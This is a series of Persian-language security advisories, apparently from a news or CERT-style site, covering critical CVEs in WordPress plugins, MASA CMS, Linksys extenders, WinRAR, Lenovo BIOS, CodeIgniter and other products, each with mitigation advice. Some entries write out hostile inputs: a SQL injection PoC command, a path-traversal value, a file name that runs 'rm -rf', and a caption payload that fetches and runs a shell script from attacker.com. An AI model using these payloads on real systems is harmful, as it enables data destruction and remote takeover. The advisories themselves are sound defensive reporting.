کشف آسیب‌پذیری در WordPress

تاریخ ایجاد

آسیب‌پذیری CVE-2025-8059 با شدت 9.8 یک ضعف امنیتی بحرانی در افزونه B Blocks وردپرس (تمامی نسخه‌ها تا و شامل 2.0.6) است که ناشی از عدم بررسی مجوز (Missing Authorization) و اعتبارسنجی نادرست ورودی در تابع ()rgfr_registration می‌باشد. این نقص به مهاجم غیر‌احراز هویت‌شده اجازه می‌دهد با ارسال درخواست ساخت کاربر جدید، نقش آن را مستقیماً به مدیر (Administrator) تغییر دهد. در نتیجه، مهاجم می‌تواند کنترل کامل وب‌سایت را در دست بگیرد، محتوای سایت را تغییر دهد یا داده‌های حساس را سرقت کند.

 

محصولات تحت‌تأثیر

  • افزونه‌ی B Blocks وردپرس (B Blocks WordPress plugin)
  • نسخه‌های آسیب‌پذیر: تمامی نسخه‌ها تا و شامل 2.0.6

 

توصیه‌های امنیتی

  • به‌روزرسانی فوری افزونه‌ی B Blocks به آخرین نسخه امن منتشرشده.
  • غیرفعال کردن ثبت‌نام عمومی کاربران تا زمان رفع کامل آسیب‌پذیری.
  • بازبینی و حذف حساب‌های کاربری مشکوک که ممکن است توسط مهاجم ایجاد شده باشند.
  • بررسی تغییرات نقش کاربران و اطمینان از عدم تخصیص غیرمجاز نقش مدیر (Administrator).
  • فعال‌سازی ثبت و پایش لاگ‌ها برای شناسایی تلاش‌های ساخت حساب غیرمجاز.
  • استفاده از افزونه‌های امنیتی وردپرس برای محدودسازی دسترسی‌ها و شناسایی رفتار مشکوک.

 

منبع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-8059

کشف آسیب‌پذیری در سیستم مدیریت محتوای MASA

تاریخ ایجاد

پلتفرم MASA CMS یک سیستم مدیریت محتوای سازمانی بر پایه فناوری متن‌باز است. نسخه‌های قبل از 7.4.6، 7.3.13 و 7.2.8 دارای آسیب‌پذیری تزریق SQL در متد processAsyncObject هستند که می‌تواند منجر به اجرای کد از راه دور شود. نسخه‌های 7.4.6، 7.3.13 و 7.2.8 شامل اصلاح این مشکل هستند.

در ابزار Ghauri:

python3 CVE-2024-32640.py --url https://target.com --ghauri "--dbs --current-db"

pic

با اضافه کردن یک %5c به مقدار پارامتر HTML به نام contenthisid، می‌توان بررسی کرد که آیا هدف نسبت به این SQL Injection آسیب‌پذیر است یا خیر. بهره‌برداری موفق از این آسیب‌پذیری می‌تواند منجر به دسترسی غیرمجاز به داده‌های حساس شود.

https://target.com/_api/json/v1/default/?method=processAsyncObject&object=displayregion&contenthist…
 

محصولات آسیب‌پذیر

  • نسخه‌های قبل از 7.4.6، 7.3.13 و 7.2.8

 

توصیه‌های امنیتی

  • این مشکل در نسخه‌های 7.4.6، 7.3.13 و 7.2.8 برطرف شده است. به کاربران توصیه می‌شود جهت رفع آسیب‌پذیری، پلتفرم را به‌روزرسانی نمایند.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2024-32640

[2]https://github.com/Stuub/CVE-2024-32640-SQLI-MuraCMS

کشف آسیب‌پذیری در سامانه‌ی مدیریت اسناد شرکت 2100 Technology

تاریخ ایجاد

آسیب‌پذیری CVE-2025-8853 یک ضعف امنیتی بسیار خطرناک با شدت 9.8 در سامانه مدیریت اسناد شرکت 2100 Technology است که امکان دور زدن کامل مکانیزم احراز هویت را فراهم می‌کند.

این مشکل در نسخه‌های 5.0.89.0 تا 5.0.89.2 وجود دارد و به مهاجم اجازه می‌دهد بدون نیاز به نام کاربری و گذرواژه، توکن نشست کاربر را به دست آورده و وارد حساب او شود. بهره‌برداری از این نقص از راه دور و بدون تعامل کاربر ممکن است و می‌تواند منجر به افشای اطلاعات محرمانه، تغییر داده‌ها یا کنترل کامل سیستم شود.

 

محصولات تحت‌تأثیر

  • سامانه‌ی رسمی مدیریت اسناد (Official Document Management System)
  • نسخه‌ی 5.0.89.0
  • نسخه‌ی 5.0.89.1
  • نسخه‌ی 5.0.89.2

 

توصیه‌های امنیتی

  • به‌روزرسانی یا نصب وصله‌ی امنیتی رسمی منتشرشده توسط 2100 Technology.
  • در صورت نبود وصله، غیرفعال‌سازی یا جداسازی سیستم آسیب‌پذیر از شبکه تا رفع مشکل.
  • بازنشانی (Reset) همه‌ی توکن‌های نشست و اعتبارنامه‌های کاربران.
  • محدود کردن دسترسی شبکه‌ای به سامانه‌ی مدیریت اسناد فقط برای کاربران و IPهای مجاز.
  • فعال‌سازی ثبت و پایش لاگ‌ها برای شناسایی هرگونه ورود یا فعالیت مشکوک.
  • آموزش کاربران و مدیران سیستم برای شناسایی علائم نفوذ و سوءاستفاده احتمالی.

 

منبع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-8853

کشف آسیب‌پذیری در دستگاه های Linksys

تاریخ ایجاد

یک آسیب‌پذیری در مدل‌های RE6250 ،RE6300 ،RE6350 ،RE6500 ،RE7000 و RE9000 مربوط به Linksys شناسایی شده است.

این مشکل در تابع setRIP در فایل /goform/setRIP وجود دارد. دستکاری آرگومان‌های RIPmode یا RIPpasswd منجر به سرریز بافر مبتنی بر پشته می‌شود.

این حمله می‌تواند به‌صورت راه دور انجام شود. اکسپلویت این آسیب‌پذیری به‌صورت عمومی منتشر شده و ممکن است مورد سوءاستفاده قرار گیرد.

pic1

ورودی اولیه مستقیماً در یک متغیر محلی که روی پشته قرار دارد کپی می‌شود، که باعث بازنویسی آدرس بازگشت تابع شده و منجر به سرریز بافر می‌گردد.

pic2

با ارسال مقدار RIPmode به صورت aaaaa...... روتر کرش خواهد کرد.

pic3

 

محصولات آسیب‌پذیر

  • RE6500 (1.0.013.001)
  • RE6250 (1.0.04.001)
  • RE6300 (1.2.07.001)
  • RE6350 (1.0.04.001)
  • RE7000 (1.1.05.003)
  • RE9000 (1.0.04.002)

 

توصیه‌های امنیتی

  • به کاربران توصیه می‌شود در صورت انتشار وصله مورد نظر، دستگاه‌ها را در اسرع وقت به‌روزرسانی نمایند.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-8824

[2]https://github.com/wudipjq/my_vuln/blob/main/Linksys1/vuln_40/40.md

کشف آسیب‌پذیری در EGallery

تاریخ ایجاد

آسیب‌پذیری CVE-2012-10052 با شدت 9.3 از 10 در افزونه‌ی EGallery نسخه 1.2 شناسایی شده است. این نقص امنیتی به مهاجم اجازه می‌دهد فایل‌های PHP مخرب را از طریق اسکریپت uploadify.php مستقیماً در مسیر قابل‌دسترس وب (پوشه‌ی egallery/) بارگذاری کند.

این آسیب‌پذیری ناشی از نبود اعتبارسنجی نوع فایل‌ها و فقدان مکانیزم‌های حفاظتی در فرآیند آپلود است که منجر به اجرای کامل کد از راه دور در بستر وب‌سرور می‌شود.

این حمله از طریق شبکه انجام می‌شود (AV:N)، پیچیدگی حمله پایین است (AC:L)، نیاز به شرایط خاص ندارد (AT:N)، و نیازی به مجوز یا تعامل کاربر ندارد (PR:N / UI:N). این آسیب‌پذیری تأثیر شدید بر محرمانگی، تمامیت و دسترس‌پذیری دارد (VC:H / VI:H / VA:H) و تأثیرات ثانویه ندارد (SC:N / SI:N / SA:N).

 

محصولات آسیب‌پذیر

  • افزونه‌ی EGallery نسخه‌ی 1.2

 

توصیه‌های امنیتی

  • حذف یا غیرفعال‌سازی افزونه‌ی EGallery نسخه‌ی 1.2 تا زمان ارائه نسخه امن
  • بررسی فایل‌های بارگذاری‌شده اخیر در مسیر egallery/ برای شناسایی فایل‌های مشکوک
  • نصب افزونه‌های امنیتی معتبر برای جلوگیری از بارگذاری‌های غیرمجاز
  • محدودسازی دسترسی به اسکریپت uploadify.php از طریق تنظیمات سرور یا فایروال
  • به‌روزرسانی وردپرس و تمامی افزونه‌ها
  • استفاده از لیست سفید MIME-type برای کنترل نوع فایل‌های قابل بارگذاری
  • بررسی لاگ‌های سرور و وب‌اپلیکیشن

 

منبع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2012-10052

کشف آسیب‌پذیری در OpenBao

تاریخ ایجاد

آسیب‌پذیری CVE-2025-54997 با شدت 9.1 در نرم‌افزار OpenBao نسخه‌های 2.3.1 و پایین‌تر، به مهاجم دارای دسترسی Privileged API Operator امکان می‌دهد با دستکاری پیشوندهای لاگ (Log Prefixes) در زیرسیستم حسابرسی (Audit Subsystem)، محدودیت‌های امنیتی تعریف‌شده برای جلوگیری از اجرای کد سیستم یا انجام ارتباطات شبکه را دور بزند.

این نقص باعث می‌شود مهاجم بتواند کد دلخواه اجرا کرده یا به منابع شبکه‌ای غیرمجاز متصل شود، در حالی که این اقدامات باید برای او مسدود شده باشد. بهره‌برداری از این ضعف می‌تواند به افزایش سطح دسترسی، نقض کامل مدل امنیتی، و دسترسی به داده‌های حساس منجر شود.

این مشکل در نسخه‌ی 2.3.2 برطرف شده و توصیه می‌شود در صورت عدم امکان به‌روزرسانی، دسترسی به مسیرهای sys/audit/* مسدود گردد، هرچند این روش برای کاربر ریشه (Root) محدودیت ایجاد نمی‌کند.

 

محصولات تحت‌تأثیر

  • OpenBao نسخه‌ی 2.3.1 و پایین‌تر
  • استقرار روی سیستم‌عامل Linux
  • استقرار روی سیستم‌عامل Windows
  • محیط‌های کانتینری (Docker, Kubernetes)
  • محیط‌های ابری (Cloud Deployments)
  • استقرارهای On-Premise

 

توصیه‌های امنیتی

  • به‌روزرسانی فوری OpenBao به نسخه‌ی 2.3.2 یا بالاتر
  • مسدود کردن دسترسی به مسیرهای sys/audit/* برای کاربران غیرمجاز
  • پایش و بررسی لاگ‌های زیرسیستم حسابرسی برای شناسایی رفتار غیرعادی
  • اعمال محدودیت‌های شبکه‌ای برای جلوگیری از ارتباطات خروجی غیرمجاز
  • استفاده از اصل کمترین دسترسی (Least Privilege) برای حساب‌های API
  • بررسی صحت و یکپارچگی پیکربندی‌های امنیتی پس از به‌روزرسانی

 

منبع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-54997

کشف آسیب‌پذیری بحرانی در Assemblyline 4 Service Client

تاریخ ایجاد

Assemblyline یک چارچوب متن‌باز تحلیل خودکار بدافزار است که برای پردازش و ارزیابی سریع حجم بالایی از فایل‌ها و نمونه‌های مشکوک استفاده می‌شود. این پلتفرم از معماری سرویس‌محور استفاده می‌کند که در آن سرویس‌ها توسط ماژول Service Client با API مرکزی تبادل داده می‌کنند.

 

جزئیات آسیب‌پذیری

در نسخه‌های آسیب‌پذیر این ابزار، فایل task_handler.py در Service Client مقدار هش SHA-256 بازگشتی از سرور سرویس را مستقیماً به‌عنوان نام فایل محلی استفاده می‌کند، بدون هیچ‌گونه اعتبارسنجی یا پاک‌سازی ورودی. یک سرور مخرب یا مهاجم در موقعیت مرد میانی می‌تواند مقداری مانند "etc/cron.d/evil/../../.." بازگرداند و باعث شود که کلاینت داده‌های دریافتی را در مسیر دلخواه سیستم قربانی ذخیره کند. این مسئله امکان نوشتن یا بازنویسی فایل‌های حیاتی سیستم را فراهم می‌سازد و می‌تواند منجر به اجرای کد مخرب یا تغییر پیکربندی سیستم شود.

این آسیب‌پذیری در سناریوهایی قابل بهره‌برداری است که کلاینت به یک سرویس غیرقابل اعتماد متصل شود یا مسیر ارتباطی بین کلاینت و سرویس در معرض حملات مرد میانی قرار داشته باشد.

بردار حمله:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H

این بردار نشان می‌دهد که آسیب‌پذیری از راه دور و بدون نیاز به تعامل کاربر یا داشتن مجوز قابل بهره‌برداری است. در صورت موفقیت، مهاجم می‌تواند یکپارچگی و دسترس‌پذیری سیستم را تحت تأثیر قرار دهد، اما بر محرمانگی داده‌ها تأثیر مستقیم ندارد.

 

نسخه‌های تحت‌تأثیر

  • تمامی نسخه‌های قبل از ‎4.6.1.dev138 تحت تأثیر این آسیب‌پذیری قرار دارند.

 

توصیه‌های امنیتی

  • به‌روزرسانی: ارتقا به نسخه‌ی ‎4.6.1.dev138 یا بالاتر که در آن اعتبارسنجی مسیر و پاک‌سازی نام فایل پیاده‌سازی شده است.
  • استفاده از TLS/SSL معتبر و امن برای جلوگیری از حملات مرد میانی.
  • محدود کردن دسترسی نوشتن در مسیرهای حساس سیستم.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-55013

[2]https://www.cvedetails.com/cve/CVE-2025-55013

[3]https://euvd.enisa.europa.eu/vulnerability/CVE-2025-55013

[4]https://www.cve.org/CVERecord?id=CVE-2025-55013

[5]https://github.com/CybercentreCanada/assemblyline/security/advisories/GHSA-75jv-vfxf-3865

[6]https://github.com/CybercentreCanada/assemblyline-service-client/commit/351414e7e96cc1f5640ae71ae51…

کشف آسیب‌پذیری در WinRAR

تاریخ ایجاد

یک آسیب‌پذیری با شناسه CVE-2025-8088 و شدت بالا با امتیاز 8.4 شناسایی شده است. این آسیب‌پذیری از نوع Path Traversal (پیمایش مسیر غیرمجاز) بوده و در نسخه ویندوز نرم‌افزار WinRAR وجود دارد. این نقص امنیتی به مهاجمان اجازه می‌دهد با ساخت فایل‌های فشرده مخرب، فایل‌هایی را در مسیرهای دلخواه سیستم قربانی استخراج کنند. این فایل‌ها می‌توانند شامل فایل‌های اجرایی باشند که در پوشه‌های Startup ویندوز قرار می‌گیرند، مانند:

  • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup (Local to user)

  • %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup (Machine-wide)

استخراج این فایل‌ها باعث می‌شود کدهای مخرب به‌صورت خودکار هنگام ورود کاربر به سیستم اجرا شوند. این موضوع امکان اجرای کد دلخواه از راه دور (Remote Code Execution - RCE) را برای مهاجم فراهم می‌کند و در نتیجه، مهاجم کنترل کامل سیستم قربانی را به دست می‌آورد.

 

محصولات آسیب‌پذیر
تمامی نسخه‌های ویندوزی نرم‌افزارهای WinRAR ،RAR ،UnRAR و کتابخانه‌ی UnRAR.dll تحت تأثیر این آسیب‌پذیری قرار دارند. نسخه‌های این نرم‌افزارها برای سیستم‌عامل‌های یونیکس و اندروید آسیب‌پذیر نیستند.

 

توصیه‌های امنیتی
با توجه به جزئیات آسیب‌پذیری مذکور، توصیه‌های امنیتی زیر پیشنهاد می‌شود:

  • انجام به‌روزرسانی فوری نرم‌افزار WinRAR به نسخه‌ی 7.13.
  • افزایش سطح آگاهی کاربران نسبت به حملات فیشینگ و اجتناب از باز کردن فایل‌های فشرده دریافت‌شده از منابع ناشناس یا غیرقابل اعتماد.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-8088

[2]https://www.bleepingcomputer.com/news/security/winrar-zero-day-flaw-exploited-by-romcom-hackers-in-…

کشف آسیب‌پذیری در محصولات Lenovo

تاریخ ایجاد

چهار آسیب‌پذیری با شدت بالا در سیستم‌های شرکت Lenovo شناسایی شده‌اند که هرکدام امتیاز 8.2 از 10 را در سیستم CVSS دریافت کرده‌اند. چهار آسیب‌پذیری CVE-2025-4421 ،CVE-2025-4422 ،CVE-2025-4423 و CVE-2025-4425 دارای بردار حمله یکسانی هستند که نشان‌دهنده سطح بالای خطر و پیچیدگی پایین در بهره‌برداری از آن‌هاست. بردار حمله‌ی این آسیب‌پذیری‌ها به شرح زیر است:

/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

حملات از طریق دسترسی محلی هستند (AV:L)، پیچیدگی پایین دارند (AC:L)، به مجوز سطح بالا (PR:H) و تعامل کاربر (UI:N) نیاز ندارند. دامنه تأثیر فراتر از مؤلفه آسیب‌پذیر است (S:C) و تأثیر بالایی بر محرمانگی، تمامیت و دسترس‌پذیری می‌گذارند (C:H/I:H/A:H).

آسیب‌پذیری‌های CVE-2025-4421 ،CVE-2025-4422 ،CVE-2025-4423 و CVE-2025-4425 همگی نقص‌هایی در مؤلفه‌های سطح پایین Firmware BIOS هستند که مهاجمان را قادر می‌سازند کنترل کامل سیستم را به‌دست بگیرند. این آسیب‌پذیری‌ها در ماژول‌های SMM، DXE و SetupAutomationSmm رخ می‌دهند و بهره‌برداری موفق از آن‌ها می‌تواند منجر به اجرای کد دلخواه، افزایش سطح دسترسی و حتی تخطی از Secure Boot شود.

این ضعف‌ها به‌دلیل نوشتن خارج از محدوده حافظه و سرریز بافر روی پشته به وجود آمده‌اند:

  • آسیب‌پذیری CVE-2025-4421 و CVE-2025-4422 از نوع نوشتن خارج از محدوده حافظه هستند (CWE-787).
  • آسیب‌پذیری CVE-2025-4423 از نوع محدودیت نادرست در عملیات حافظه است (CWE-119).
  • آسیب‌پذیری CVE-2025-4425 از نوع سرریز بافر مبتنی بر پشته است (CWE-121).

از آن‌جا که حملات در سطح پایین سیستم انجام می‌شوند، حتی پس از نصب مجدد سیستم‌عامل نیز باقی می‌مانند و ممکن است تأثیر آن‌ها به سایر بخش‌های امنیتی سیستم نیز گسترش یابد.

 

محصولات آسیب‌پذیر

  • لپ‌تاپ‌ها و دسکتاپ‌های شرکت Lenovo که از نسخه‌های خاصی از Firmware مبتنی بر Insyde BIOS استفاده می‌کنند.
  • سیستم‌هایی که از ماژول‌های EfiSmiServices، EfiPcdProtocol و SetupAutomationSmm بهره می‌برند.
  • نسخه‌هایی که فاقد بررسی‌های امنیتی در حافظه SMM یا پشته هستند.
  • سیستم‌هایی که به‌روزرسانی‌های امنیتی منتشرشده تا 30 جولای 2025 را دریافت نکرده‌اند.

 

توصیه‌های امنیتی

  • بررسی نسخه‌ی BIOS و به‌روزرسانی به نسخه‌های امن منتشرشده توسط Lenovo.
  • فعال‌سازی مکانیزم‌های حفاظتی مانند Secure Boot و Firmware Integrity Verification.
  • استفاده از ابزارهای تحلیل Firmware مانند Binarly efiXplorer برای بررسی آسیب‌پذیری‌های مشابه.
  • محدودسازی دسترسی فیزیکی و محلی به دستگاه‌ها.
  • نظارت بر تغییرات غیرمجاز در Firmware با استفاده از راهکارهایی مانند HP Sure Start یا Lenovo Eclypsium.

 

منابع خبر:

[1]https://nvd.nist.gov/vuln/detail/CVE-2025-4425

[2]https://nvd.nist.gov/vuln/detail/CVE-2025-4421

[3]https://nvd.nist.gov/vuln/detail/CVE-2025-4423

[4]https://nvd.nist.gov/vuln/detail/CVE-2025-4422

کشف آسیب‌پذیری اجرای فرمان در PHP CodeIgniter

تاریخ ایجاد

CodeIgniter یک چارچوب توسعه برنامه‌های تحت وب PHP Full-stack است که به دلیل سادگی و کارایی بالا بسیار پرکاربرد است. اخیراً یک آسیب‌پذیری بحرانی با شناسه‌ی CVE-2025-54418 و شدت 9.8 در کتابخانه ImageMagick که امکان پردازش تصاویر را در CodeIgniter فراهم می‌سازد، شناسایی شده است. استفاده نادرست از این کتابخانه در کنار ورودی‌های غیرایمن کاربر می‌تواند منجر به آسیب‌های جدی امنیتی شود.

 

جزئیات آسیب‌پذیری

این آسیب‌پذیری یک نقص امنیتی از نوع تزریق دستورات سیستم‌عامل است که هنگام استفاده از ابزار ImageMagick به‌عنوان ابزار پردازش تصویر رخ می‌دهد. از آن‌جا که اجرای ImageMagick در سطح سیستم‌عامل انجام می‌شود، این آسیب‌پذیری به مهاجم اجازه می‌دهد از طریق روش‌های زیر حمله را انجام دهد و فرمان‌های دلخواه سیستم‌عامل را اجرا کند:

1. آپلود فایلی با نام مخرب

آپلود فایلی که نام آن شامل کاراکترهای خاص مورد استفاده در پوسته سیستم‌عامل باشد و با همین نام ذخیره و با استفاده از متد ()resize پردازش ‌شود. به‌عنوان مثال، فایل با نام زیر اگر توسط ابزار ImageMagick تحلیل شود، منجر به حذف کل فایل‌های وب‌سرور می‌گردد:

$(rm -rf /var/www/html/*).jpg

2. استفاده از ورودی متنی مخرب در متد ()text

وارد کردن متنی مخرب هنگام استفاده از ()متد text با استفاده از ورودی‌های اعتبارسنجی‌نشده، به مهاجم امکان می‌دهد دستورات دلخواه را اجرا کرده و کنترل کامل سیستم قربانی را به دست آورد. به‌عنوان مثال، اگر کاربر متن زیر را از طریق متد ()text برای درج روی یک تصویر وارد نماید، به دلیل عدم پاک‌سازی ورودی، کد مخربی از سرور مهاجم دانلود شده و منجر به نصب درب پشتی، سرقت اطلاعات یا کنترل کامل سیستم می‌شود:

caption:@|bash -c "curl http://attacker.com/shell.sh | bash"

 

بردار CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H نشان می‌دهد بهره‌برداری از آن نیازی به دسترسی قبلی و تعامل کاربر ندارد و مهاجم می‌تواند از طریق ارسال درخواست از راه دور، بدون احراز هویت و با کمترین پیچیدگی، فرمان‌هایی را اجرا کند که منجر به افشای اطلاعات حساس، تغییر یا تخریب داده‌ها، و توقف کامل سرویس شود. این نقص امنیتی محرمانگی، یکپارچگی و دسترس‌پذیری سامانه را تحت تأثیر قرار می‌دهد.

 

نسخه‌های تحت‌تأثیر

  • تمام نسخه‌های CodeIgniter قبل از 4.6.2 که از ImageMagick به‌عنوان پردازشگر تصویر استفاده می‌کنند، در معرض این حمله قرار دارند.

 

توصیه‌های امنیتی

  • ارتقا CodeIgniter به نسخه‌ی 4.6.2 یا بالاتر.
  • استفاده از ابزار پردازشگر پیش‌فرض GD به‌جای ImageMagick که نسبت به این آسیب‌پذیری ایمن است.
  • هنگام ذخیره فایل‌های آپلودشده، از نام‌های تصادفی مانند خروجی تابع ()getRandomName یا ()store استفاده شود تا از تزریق کاراکترهای مخرب در نام فایل جلوگیری گردد.
  • در کاربرد تابع ()text، لازم است ورودی‌ها پاک‌سازی شده و کاراکترهای غیرمجاز حذف شوند.

 

منابع خبر:

[1]https://www.cvedetails.com/cve/CVE-2025-54418

[2]https://nvd.nist.gov/vuln/detail/CVE-2025-54418

[3]https://www.cve.org/CVERecord?id=CVE-2025-54418

[4]https://euvd.enisa.europa.eu/vulnerability/CVE-2025-54418

[5]https://github.com/codeigniter4/CodeIgniter4/security/advisories